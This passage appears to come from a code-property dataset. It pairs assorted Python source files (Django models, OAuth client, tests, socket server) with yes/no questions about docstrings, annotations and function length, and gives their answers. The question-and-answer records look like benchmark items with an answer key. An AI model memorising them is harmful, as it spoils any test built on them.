cmeta = (execution.get('cumulative_metadata') or {})
all_metadata_keys.update(set(cmeta.keys()))
all_metadata[execution['counter']] = (execution, cmeta)
table_data = []
for counter, (execution, metadata) in sorted(all_metadata.items()):
row = subset_keys(execution, {'counter', 'id', 'duration'})
row.update(metadata)
table_data.append(row)
columns = ['counter', 'duration'] + list(sorted(all_metadata_keys))
headers = ['Execution', 'Duration'] + list(sorted(all_metadata_keys))
print_table(table_data, columns=columns, headers=headers)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"a... | 3 | valohai_cli/commands/execution/summarize.py | JohnCHarrington/valohai-cli |
from . import FixtureTest
class BusinessAndSpurRoutes(FixtureTest):
def _check_route_relation(
self, rel_id, way_id, tile, shield_text, network):
z, x, y = map(int, tile.split('/'))
self.load_fixtures([
'https://www.openstreetmap.org/relation/%d' % (rel_id,),
], clip=self.tile_bbox(z, x, y))
# check that First Capitol Dr, part of the above relation, is given
# a network that includes the "business" extension.
self.assert_has_feature(
z, x, y, 'roads',
{'id': way_id, 'shield_text': shield_text, 'network': network})
def test_first_capitol_dr_i70_business(self):
self._check_route_relation(
1933234, 12276055, '16/16294/25097', '70', 'US:I:Business')
def test_business_loop(self):
self._check_route_relation(
1935116, 5807439, '16/12285/23316', '15', 'US:I:Business:Loop')
def test_nj_essex(self):
self._check_route_relation(
945855, 221295008, '16/19267/24623', '672', 'US:NJ:Essex:Spur')
def test_nj_cr(self):
self._check_route_relation(
941526, 60523740, '16/19192/24767', '526', 'US:NJ:CR:Spur')
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than clas... | 3 | integration-test/1387-business-and-spur-routes.py | rinnyB/vector-datasource |
import requests
from collections import OrderedDict
from django.utils.http import urlencode
from allauth.socialaccount.providers.core.oauth2.client import (
OAuth2Client,
OAuth2Error,
)
class WeixinOAuth2Client(OAuth2Client):
def get_redirect_url(self, authorization_url, extra_params):
params = {
'appid': self.consumer_key,
'redirect_uri': self.callback_url,
'scope': self.scope,
'response_type': 'code'
}
if self.state:
params['state'] = self.state
params.update(extra_params)
sorted_params = OrderedDict()
for param in sorted(params):
sorted_params[param] = params[param]
return '%s?%s' % (authorization_url, urlencode(sorted_params))
def get_access_token(self, code):
data = {'appid': self.consumer_key,
'redirect_uri': self.callback_url,
'grant_type': 'authorization_code',
'secret': self.consumer_secret,
'scope': self.scope,
'code': code}
params = None
self._strip_empty_keys(data)
url = self.access_token_url
if self.access_token_method == 'GET':
params = data
data = None
# TODO: Proper exception handling
resp = requests.request(self.access_token_method,
url,
params=params,
data=data)
access_token = None
if resp.status_code == 200:
access_token = resp.json()
if not access_token or 'access_token' not in access_token:
raise OAuth2Error('Error retrieving access token: %s'
% resp.content)
return access_token
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | allauth/socialaccount/providers/other/weixin/client.py | Cairnica/django-allauth |
# coding: utf-8
from dj_diabetes.models.appointments import Appointments
from django import forms
class AppointmentsForm(forms.ModelForm):
"""
Appointments Form
"""
# to " suit " the HTML textearea
title = forms.CharField(widget=forms.TextInput(
attrs={'class': 'form-control'}))
body = forms.CharField(widget=forms.Textarea(
attrs={'class': 'form-control', 'rows': '3'}))
recall_one_duration = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'type': 'number'}))
recall_two_duration = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'type': 'number'}))
recall_one_unit = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'type': 'number'}))
recall_two_unit = forms.IntegerField(widget=forms.TextInput(
attrs={'class': 'form-control', 'type': 'number'}))
date_appointments = forms.DateField(widget=forms.TextInput(
{'class': 'form-control'}))
hour_appointments = forms.TimeField(widget=forms.TextInput(
{'class': 'form-control'}))
class Meta:
model = Appointments
fields = ['appointment_types', 'title', 'body',
'date_appointments', 'hour_appointments',
'recall_one_duration', 'recall_two_duration',
'recall_one_unit', 'recall_two_unit']
def __init__(self, *args, **kwargs):
super(AppointmentsForm, self).__init__(*args, **kwargs)
self.fields['appointment_types'].widget.attrs['class'] = 'form-control'
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
}... | 3 | dj_diabetes/forms/appointments.py | foxmask/dj-diabetes |
#!/usr/bin/env python3
import sys
from functools import reduce
tree_encounter_check = lambda pos: 1 if pos == "#" else 0
def main(forest):
slope_mode = [
(1, 1),
(3, 1),
(5, 1),
(7, 1),
(1, 2),
]
mode_to_result = [(mode, resolve_encounters(forest, *mode)) for mode in slope_mode]
for mode, result in mode_to_result:
print(f"For {mode}, encounters={result}")
results = [r for _, r in mode_to_result]
result = reduce(lambda x, y: x * y, results)
print(f"product({','.join(str(r) for r in results)}) = {result}")
def resolve_encounters(forest, shift_right, shift_bottom, verbose = "-v" in sys.argv) -> int:
map_length = len(forest[0])
# Resolve the initial position as the first encounter
n_tree_encounter = tree_encounter_check(forest[0][0])
column = shift_right # Start from initial position + shift_right
if verbose:
print(f">> For Right {shift_right}, Down {shift_bottom}")
print(("X" if forest[0][0] == "#" else "O") + forest[0][1:])
for row, line in enumerate(forest[1:]):
if (row + 1) % shift_bottom != 0:
if verbose: print(line)
continue
# Consider this new tile
column_rel = column % map_length
n_tree_encounter += tree_encounter_check(line[column_rel])
if verbose:
marked_line = line[0:column_rel] + ("X" if line[column_rel] == "#" else "O") + line[column_rel+1:]
print(marked_line)
# And continue to the next slope
column += shift_right
return n_tree_encounter
if __name__ == '__main__':
main([i.strip() for i in open(sys.argv[1]).readlines()])
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fal... | 3 | d3/tree-encounters-v2.py | pgreze/adventofcode |
#
# Copyright 2021 Budapest Quantum Computing Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from theboss.boson_sampling_utilities.permanent_calculators.glynn_gray_permanent_calculator import ( # noqa: E501
GlynnGrayPermanentCalculator,
)
def _permanent(matrix, rows, columns, calculator_class):
calculator = calculator_class(matrix, rows, columns)
return calculator.compute_permanent()
def glynn_gray_permanent(matrix, rows, columns):
return _permanent(
matrix, rows, columns, calculator_class=GlynnGrayPermanentCalculator
)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docst... | 3 | piquasso/_math/permanent.py | antalszava/piquasso |
from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
from django.db.models.signals import post_save
# Create your models here.
class Profile(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL)
date_of_birth = models.DateField(blank=True, null=True)
photo = models.ImageField(upload_to='users/%Y/%m/%d', blank=True)
course_bookmark = models.CharField(max_length=100, default='the-strategy')
module_bookmark = models.PositiveIntegerField(default=0)
def __str__(self):
return 'Profile for user {}'.format(self.user.username)
class Contact(models.Model):
user_from = models.ForeignKey(User, related_name='rel_from_set')
user_to = models.ForeignKey(User, related_name='rel_to_set')
created = models.DateTimeField(auto_now_add=True, db_index=True)
class Meta:
ordering = ('-created',)
def __str__(self):
return '{} follows {}'.format(self.user_from, self.user_to)
User.add_to_class('following', models.ManyToManyField('self',
through=Contact,
related_name='followers',
symmetrical=False))
# Signal to auto-create a profile when a User is created.
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
post_save.connect(create_user_profile, sender=User)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | account/models.py | pauljherrera/avantiweb |
import urllib.request
import feedparser
import ujson
from centrifuge.domain import document as ad
class CrawlerArxivRepo:
"""
This is a helper class to parse arxiv.org site.
It uses the arxiv.org REST API to search for articles.
based on karpathy's arxiv-sanity:
https://github.com/karpathy/arxiv-sanity-preserver/blob/master/fetch_papers.py
and arxiv example:
https://arxiv.org/help/api/examples/python_arXiv_parsing_example.txt
"""
# Base api query url
base_url = 'https://keepcurrent-crawler.herokuapp.com/'
def list(self, filters=None):
if not filters:
return self.fetch_papers()
def run_query(self):
query = 'arxiv'
with urllib.request.urlopen(self.base_url+query) as url:
response = url.read()
parsed_response = ujson.loads(response)
return parsed_response
def fetch_papers(
self
):
"""
fetch results from our crawler
"""
# num_added_total = 0
parsed_response = self.run_query()
return parsed_response
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | centrifuge/repository/crawler_arxiv_repo.py | datadonK23/Engine |
from genmod.vcf_tools.header_parser import HeaderParser
def test_parse_info():
## GIVEN a header object
head = HeaderParser()
assert 'MQ' not in head.info_dict
info_line = '##INFO=<ID=MQ,Number=1,Type=Float,Description="RMS Mapping Quality">'
## WHEN parsing a correct info line
head.parse_meta_data(info_line)
## THEN assert it is added to the parser
assert 'MQ' in head.info_dict
def test_parse_contig():
## GIVEN a header object
head = HeaderParser()
assert '1' not in head.contig_dict
contig_line = '##contig=<ID=1,length=249250621,assembly=b37>'
## WHEN parsing a correct info line
head.parse_meta_data(contig_line)
## THEN assert it is added to the parser
assert '1' in head.contig_dict
def test_parse_contig_no_length():
## GIVEN a header object
head = HeaderParser()
assert '1' not in head.contig_dict
contig_line = '##contig=<ID=1,assembly=b37>'
## WHEN parsing a correct info line
head.parse_meta_data(contig_line)
## THEN assert it is added to the parser
assert '1' in head.contig_dict
def test_parse_minimal_contig():
## GIVEN a header object
head = HeaderParser()
assert '1' not in head.contig_dict
contig_line = '##contig=<ID=1>'
## WHEN parsing a correct info line
head.parse_meta_data(contig_line)
## THEN assert it is added to the parser
assert '1' in head.contig_dict | [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | tests/vcf_tools/test_header_parser.py | Varstation/genmod |
import unittest
class Node:
def __init__(self,val,adjacent=None):
self.val = val
self.adjacent = adjacent
self._marked = False
@property
def marked(self):
return self._marked
@marked.setter
def marked(self,value):
if isinstance(value,bool):
self._marked = value
else:
raise TypeError("Value is not a boolean")
def addEdge(self,node):
self.adjacent += [node]
class Queue:
def __init__(self,listQueue=None):
self.listQueue = listQueue
def addElement(self,val):
self.listQueue.append(val)
return self.listQueue
def removeElement(self):
if self.listQueue:
return self.listQueue.pop(0)
def routebtwNodes(start,end):
if start == end:
return True
thequeue = Queue([])
node_s = start
node_s.marked = True
thequeue.addElement(node_s)
while thequeue.listQueue:
node_r = thequeue.removeElement()
if node_r.adjacent != None:
for r in node_r.adjacent:
if r.marked == False:
if r.val == end.val:
return True
else:
thequeue.addElement(r)
r.marked = True
return False
def resetMarked(nodes):
for i in nodes:
i.marked = False
class Test(unittest.TestCase):
def test_routebtwNodes(self):
node_c = Node('C')
node_d = Node('D')
node_b = Node('B', [node_c])
node_a = Node('A',[node_d,node_b])
node_e = Node('E',[node_a])
node_b.addEdge(node_a)
nodes = [node_a,node_b,node_c,node_d,node_e]
testCases = [[node_e,node_e,True],
[node_a,node_b,True],
[node_b,node_a,True],
[node_e,node_c,True],
[node_d,node_c,False]
]
for case in testCases:
print('(node_' + case[0].val + ',node_' + case[1].val + ')' + ' ' + str(case[2]))
self.assertEqual(routebtwNodes(case[0],case[1]),case[2])
resetMarked(nodes)
if __name__ == '__main__':
unittest.main() | [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | ch-04-TreesGraphs/routebtwNodes.py | jgraille/CtCy-6th-Edition-Python- |
from mxnet import nd
from mxnet.gluon import nn
net = nn.Sequential()
net.add(
nn.Conv2D(
channels=6,
kernel_size=5,
activation='relu'),
nn.MaxPool2D(pool_size=2, strides=2),
nn.Conv2D(
channels=16,
kernel_size=3,
activation='relu'),
nn.MaxPool2D(pool_size=2, strides=2),
nn.Dense(120, activation='relu'),
nn.Dense(84, activation='relu'),
nn.Dense(10))
net.initialize()
x = nd.random.uniform(
shape=(4, 1, 28, 28))
y = net(x)
print(y.shape)
class MixMLP(nn.Block):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.blk = nn.Sequential()
self.blk.add(
nn.Dense(3, activation='relu'),
nn.Dense(4, activation='relu'))
self.dense= nn.Dense(5)
def forward(self, x):
y = nd.relu(self.blk(x))
print(y)
return self.dense(y)
net = MixMLP()
print(net)
net.initialize()
x = nd.random.uniform(shape=(2,2))
print(net(x))
print(net.blk[1].weight.data())
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | ml/mxnet/tutorial/02_create_neural_net.py | rrbb014/rrbb-playground |
# -*- coding: utf-8 -*-
import json
from wechatpy.session import SessionStorage
from wechatpy.utils import to_text
class MemcachedStorage(SessionStorage):
def __init__(self, mc, prefix='wechatpy'):
for method_name in ('get', 'set', 'delete'):
assert hasattr(mc, method_name)
self.mc = mc
self.prefix = prefix
def key_name(self, key):
return '{0}:{1}'.format(self.prefix, key)
def get(self, key, default=None):
key = self.key_name(key)
value = self.mc.get(key)
if value is None:
return default
return json.loads(to_text(value))
def set(self, key, value, ttl=0):
if value is None:
return
key = self.key_name(key)
value = json.dumps(value)
self.mc.set(key, value, ttl)
def delete(self, key):
key = self.key_name(key)
self.mc.delete(key)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | wechatpy/session/memcachedstorage.py | messense/wechatpy |
from dataloader import AmazonProductDataloader
from inverted_index import InvertedIndex
from utils import preprocess_text
import numpy as np
class BM25SearchRelevance:
def __init__(self, inverted_index, b=0.65, k1=1.6):
self.inverted_index = inverted_index
self.b = b
self.k1 = k1
self.total_documents = inverted_index.dataloader.dataset.shape[0]
self.total_documents
def score_query(self, query, k=3):
scores = {}
preprocessed_query = preprocess_text(query, tokens_only=True)
for query_term in preprocessed_query:
if query_term in self.inverted_index.term_dictionary:
term_frequencies = self.inverted_index.term_dictionary[query_term]
for term_frequency in term_frequencies:
if term_frequency["document"] not in scores:
scores[term_frequency["document"]] = 0
scores[term_frequency["document"]] += self.bm25_score(term_frequency["frequency"], len(term_frequency), term_frequency["document_length"])
scores = dict(sorted(sorted(scores.items(), key=lambda x: x[1])))
if k > len(scores.keys()):
k = len(scores.keys())
return list(scores.keys())[:k] ## returns top k documents
def bm25_score(self, term_frequency, document_frequency, document_length):
tf = term_frequency / self.k1 * ((1-self.b) + (self.b * (document_length / self.inverted_index.average_document_length))) + term_frequency
idf = np.log((self.total_documents - document_frequency + 0.5)/ (document_frequency + 0.5))
return tf * idf
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | lecture1/code/bm25_search_relevance.py | shahrukhx01/advanced-information-retrieval-tu-wien |
"""
Runner for a Celery Python function
"""
from __future__ import absolute_import
import time
from uuid import uuid4
from importlib import import_module
from ..event import BaseEvent
from ..utils import add_data_if_needed
class CeleryRunner(BaseEvent):
"""
Represents Python Celery event runner.
"""
ORIGIN = 'runner'
RESOURCE_TYPE = 'celery'
OPERATION = 'execute'
def __init__(self, *args, **kwargs): # pylint: disable=unused-argument
"""
Initialize.
:param start_time: event's start time (epoch).
"""
super(CeleryRunner, self).__init__(time.time())
self.event_id = str(uuid4())
self.resource['name'] = (
kwargs.get('sender').name
if kwargs.get('sender')
else ''
)
self.resource['operation'] = self.OPERATION
app_conn = import_module('celery').current_app.connection()
task_id = kwargs.get('task_id', '')
body = kwargs.get('args')
retval = kwargs.get('retval')
state = kwargs.get('state', '')
self.resource['metadata'].update({
'id': task_id,
'state': state,
'hostname': app_conn.hostname,
'virtual_host': app_conn.virtual_host,
'driver': app_conn.transport.driver_type,
})
if body:
add_data_if_needed(
self.resource['metadata'],
'args',
body
)
if retval:
add_data_if_needed(
self.resource['metadata'],
'retval',
retval
)
def set_retry(self, attempt_number):
"""
Setting retry attempt number
"""
self.resource['metadata']['attempt_number'] = attempt_number
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},... | 3 | epsagon/runners/celery.py | clericeon/epsagon-python |
def declare_variables(variables, macro):
"""
This is the hook for the functions
- variables: the dictionary that contains the variables
- macro: a decorator function, to declare a macro.
"""
@macro
def inputcode(filename, language):
f = open(filename, 'r')
text = f.read()
textblock = f'```{language}\n{text}\n```'
return textblock
@macro
def inputcpp(filename):
return inputcode(filename, 'cpp')
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
... | 3 | main.py | ram-nad/autodiff |
#! /usr/bin/env python
"""provide some mediawiki markup example snippets"""
import os
class snippet(object):
def __init__(self, txt, id):
self.txt = txt
self.id = id
def __repr__(self):
return "<%s %r %r...>" % (self.__class__.__name__, self.id, self.txt[:10])
def get_all():
fp = os.path.join(os.path.dirname(__file__), 'snippets.txt')
examples = unicode(open(fp).read(), 'utf-8').split(unichr(12) + '\n')[1:]
res = []
for i, x in enumerate(examples):
res.append(snippet(x, i))
return res
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": ... | 3 | mwlib/snippets.py | pediapress/mwlib |
"""
Plotting utilities for example notebooks
"""
import matplotlib.pyplot as plt
import numpy as np
def plot_image(image=None, mask=None, ax=None, factor=3.5/255, clip_range=(0, 1), **kwargs):
""" Utility function for plotting RGB images and masks.
"""
if ax is None:
_, ax = plt.subplots(nrows=1, ncols=1, figsize=(15, 15))
mask_color = [255, 255, 255, 255] if image is None else [255, 255, 0, 100]
if image is None:
if mask is None:
raise ValueError('image or mask should be given')
image = np.zeros(mask.shape + (3,), dtype=np.uint8)
ax.imshow(np.clip(image * factor, *clip_range), **kwargs)
if mask is not None:
cloud_image = np.zeros((mask.shape[0], mask.shape[1], 4), dtype=np.uint8)
cloud_image[mask == 1] = np.asarray(mask_color, dtype=np.uint8)
ax.imshow(cloud_image)
def plot_probabilities(image, proba, factor=3.5/255):
""" Utility function for plotting a RGB image and its cloud probability map next to each other.
"""
plt.figure(figsize=(15, 15))
ax = plt.subplot(1, 2, 1)
ax.imshow(np.clip(image * factor, 0, 1))
plt.show
ax = plt.subplot(1, 2, 2)
ax.imshow(proba, cmap=plt.cm.inferno)
plt.show
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
... | 3 | examples/plotting_utils.py | Broly498/sentinel2-cloud-detector |
import logging,os
from rest import Restclient
LOCAL_DATA_FOLDER = '/DATA'
GENOTYPE_FOLDER = '/GENOTYPE'
REST_HOST = os.environ['REST_HOST']
REST_USERNAME = os.environ['REST_USERNAME']
REST_PASSWORD = os.environ['REST_PASSWORD']
restclient = Restclient(REST_HOST,REST_USERNAME,REST_PASSWORD)
class CeleryProgressLogHandler(logging.StreamHandler):
def __init__(self,task):
logging.StreamHandler.__init__(self)
self.task = task
def emit(self,record):
if 'progress' in record.__dict__:
progress = record.__dict__['progress']
msg = self.format(record)
if 'task' in record.__dict__:
msg = record.__dict__['task']
body = {'progress':progress,'task':msg}
self.task.update_state(state='PROGRESS',meta=body)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | gwaportalpipeline/common.py | timeu/gwaportal-analysis-pipeline |
from fastapi import FastAPI
from starlette.responses import PlainTextResponse
from starlette.staticfiles import StaticFiles
from typing import Dict, Optional as Opt
from pydantic import BaseModel
from starlette.requests import Request
"""
* Have programme create the srimdata and pickle/sqlite it
* create api points with fast api
* uppcikle data, serve to api
* display in webpage starlette: list page and item pages
"""
"""
* buttons / inputs to run new srims
* login auth
"""
class Item(BaseModel):
name: str
description: Opt[str] = None
price: float
tax: Opt[float] = None
app = FastAPI()
app.mount("/static", StaticFiles(directory="static"), name="static")
@app.post("/items/")
async def create_item(item: Item) -> Item:
return item
@app.get("/items/{item_id}")
async def read_item(item_id: int) -> Dict[str, int]:
return {"item_id": item_id}
@app.get("/")
async def home(request: Request) -> PlainTextResponse:
return PlainTextResponse(f"Hello, world!")
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (exc... | 3 | src/webgui.py | Yobmod/dmlsrim |
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from batchgenerators.utilities.file_and_folder_operations import *
def remove_trailing_slash(filename: str):
while filename.endswith('/'):
filename = filename[:-1]
return filename
def maybe_add_0000_to_all_niigz(folder):
nii_gz = subfiles(folder, suffix='.nii.gz')
for n in nii_gz:
n = remove_trailing_slash(n)
if not n.endswith('_0000.nii.gz'):
os.rename(n, n[:-7] + '_0000.nii.gz')
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | nnunet/utilities/file_endings.py | anxingle/nnUNet_simple |
from conan_tests.test_regression.utils.base_exe import BaseExeTest, run, conan_create_command
class Bzip2Test(BaseExeTest):
libref = "bzip2/1.0.6@conan/stable"
librepo = "https://github.com/lasote/conan-bzip2.git"
branch = "release/1.0.6"
def setUp(self):
super(Bzip2Test, self).setUp()
run("conan remove %s -f" % self.libref)
def test_repo(self):
run("git clone --depth 1 %s -b %s ." % (self.librepo, self.branch))
run(conan_create_command("conan/testing"))
def test_install_remote(self):
run("git clone --depth 1 %s -b %s ." % (self.librepo, self.branch))
run("conan test test_package %s" % self.libref)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | conan_tests/test_regression/packages/bzip2_test.py | jgsogo/test |
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeQuotaRequest(JDCloudRequest):
"""
查询配额信息
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeQuotaRequest, self).__init__(
'/regions/{regionId}/quotas/', 'GET', header, version)
self.parameters = parameters
class DescribeQuotaParameters(object):
def __init__(self, regionId, type, ):
"""
:param regionId: Region ID
:param type: 资源类型,取值范围:vpc、elastic_ip、subnet、security_group、vpcpeering、network_interface(配额只统计辅助网卡)
"""
self.regionId = regionId
self.type = type
self.parentResourceId = None
def setParentResourceId(self, parentResourceId):
"""
:param parentResourceId: (Optional) type为vpc、elastic_ip、network_interface不设置, type为subnet、security_group、vpcpeering设置为vpcId
"""
self.parentResourceId = parentResourceId
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | jdcloud_sdk/services/vpc/apis/DescribeQuotaRequest.py | jdcloud-demo/jdcloud-sdk-python |
import numpy
from fframework import asfunction, OpFunction
__all__ = ['Angle']
class Angle(OpFunction):
"""Transforms a mesh into the angle of the mesh to the x axis."""
def __init__(self, mesh):
"""*mesh* is the mesh Function."""
self.mesh = asfunction(mesh)
def __call__(self, ps):
"""Returns the arctan2. The (y, x) coordinate is in the last
dimension."""
meshT = self.mesh(ps).T
return numpy.arctan2(meshT[0], meshT[1]).T
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},... | 3 | moviemaker3/math/angle.py | friedrichromstedt/moviemaker3 |
""" """
import pygame
class Robot:
def __init__(self, screen):
self.screen = screen
self.image = pygame.image.load('images/robot.bmp')
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
self.rect.centerx = self.screen_rect.centerx
self.rect.bottom = self.screen_rect.bottom
def blitme(self):
self.screen.blit(self.image, self.rect) | [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | python/python_crash_course/project_alien_invasion/robot.py | lmonsalve22/Learning-to-Code |
from __future__ import print_function
from time import sleep
import matplotlib.pyplot as plt
import signal
def sigIntHandler(signal, frame):
raise KeyboardInterrupt
def publishPose(q, problem, t=0.0):
problem.getScene().Update(q, t)
problem.getScene().getSolver().publishFrames()
def publishTrajectory(traj, T, problem):
if len(traj) == 0:
print("Trajectory has zero elements")
raise
signal.signal(signal.SIGINT, sigIntHandler)
print('Playing back trajectory '+str(T)+'s')
dt = float(T)/float(len(traj))
t = 0
while True:
try:
publishPose(traj[t], problem, float(t)*dt)
sleep(dt)
t = (t+1) % len(traj)
except KeyboardInterrupt:
return False
return True
def publishTimeIndexedTrajectory(traj, Ts, problem, once=False):
if len(traj) == 0:
print("Trajectory has zero elements")
raise
signal.signal(signal.SIGINT, sigIntHandler)
print('Playing back trajectory '+str(len(Ts)) +
' states in '+str(Ts[len(Ts)-1]))
idx = 0
while True:
try:
for i in range(1, len(Ts)-1):
publishPose(traj[i], problem, Ts[i])
sleep(Ts[i]-Ts[i-1])
if once:
break
except KeyboardInterrupt:
return False
return True
def plot(solution):
print('Plotting the solution')
plt.plot(solution, '.-')
plt.show()
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written ... | 3 | exotica_python/src/pyexotica/publish_trajectory.py | LongfeiProjects/exotica |
import sys
import socket
sys.path.append('../')
import common.define
BUF_SIZE = 2048
class ReptilesServerSocket():
def __init__(self, sock=None):
if sock is None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
self.sock = sock
def setsocket(self):
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def bind(self):
self.sock.bind((common.define.SERVER_IP_ADDR, common.define.SERVER_PORT))
def listen(self, num=1):
self.sock.listen(num)
def accept(self):
self.conn, self.addr = self.sock.accept()
def send(self, msg):
totalsent = 0
msglen = len(msg)
while totalsent < msglen:
sent = self.conn.send(msg[totalsent:])
if sent == 0:
raise RuntimeError("socket connection broken")
totalsent = totalsent + sent
def receive(self, msglen):
